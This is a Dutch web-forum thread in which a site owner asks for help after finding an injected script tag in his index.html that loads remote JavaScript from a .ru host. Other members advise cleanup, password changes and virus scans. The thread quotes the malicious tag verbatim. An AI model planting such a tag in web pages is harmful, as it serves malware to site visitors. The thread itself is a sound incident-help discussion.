virus op website

Status
Niet open voor verdere reacties.

masterdecoy2

Gebruiker
Lid geworden
23 feb 2010
hoi,

Ik heb een aantal websites gemaakt. Nu kwam ik er vandaag achter dat ze allemaal een virusmelding geven zodra iemand op de website komt. Nu heb ik uitgevonden dat er een extra script in mijn index.html staat:

<script type="text/javascript" src="http://pantscow.ru:8080/Screenshot.js"></script>
<!--6aa30b6fcc08ca35f4c76c2d56724b34-->

1. Weten jullie wat dit is?
  2. Hoe ben ik er aan gekomen?
  3. Is alleen index.html geinfecteerd denken jullie?
  4. Hoe kom ik er van af?
  5. Hoe zorg ik dat ik het nooit weer krijg?

thanx!

Weten jullie wat dit is?
Ik denk het te weten, doe 't niet zeker. Mijn gok gaat uit naar een script dat een screenshot maakt van de gebruiker zijn desktop en die verstuurd naar de kwaadaardige hacker.

Hoe ben ik er aan gekomen?
Mogelijk doordat iemand je wachtwoord heeft en je website heeft kunnen veranderen of door je hosting.

Is alleen index.html geinfecteerd denken jullie?
Denk ik niet. Controleer toch maar even!

Hoe kom ik er van af?
Je originele scripts online zetten zonder de injectie. Ook je wachtwoord veranderen (FTP wachtwoord). Dan meteen de volgende dag kijken of het script er nog in staat. Zoja: wisselen van hosting.

Hoe zorg ik dat ik het nooit weer krijg?
Regelmatig je wachtwoord veranderen, regelmatig checken of het er weer op staat en eventueel regelmatig een backup nemen van de niet-injected scripts.

Ik heb intussen ook wat meer achtergrondinformatie kunnen vinden zoals Tardis ook al vond: http://safebrowsing.clients.google....:8080/Screenshot.js&client=googlechrome&hl=nl
Fijne avond,
R. de Vries

Laatst bewerkt:
Bedankt voor jullie reactie! daar kan ik echt wel wat mee. Denk ook dat mijn computer geinfecteerd is en dat daarbij alle gegevens uit filezilla zijn gestolen.

Ik ga de wachtwoorden veranderen van al mijn sites. Want er waren minimaal 4 geinfecteerd. Daarna ga ik de bestanden stuk voor stuk opnieuw uploaden.

Nogmaals bedank!

Doe dat ;-) Wel eerst je scannen op virussen en daarna pas alles veranderen he, anders helpt het niet veel. We horen wel van je of het is gelukt :-)

Fijne avond,
R. de Vries

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan